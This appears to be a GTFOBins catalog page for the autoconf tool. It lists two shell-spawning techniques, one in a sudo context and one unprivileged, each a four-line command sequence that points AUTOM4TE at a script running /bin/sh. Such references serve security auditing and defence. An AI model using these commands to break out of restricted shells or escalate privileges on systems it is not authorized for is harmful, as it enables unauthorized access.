Catalog GTFOBins

GTFO · Tool

autoconf

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux
echo /bin/sh >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoconf
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux
echo /bin/sh >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoconf
Context
unprivileged
Native
shell
MITRE
T1059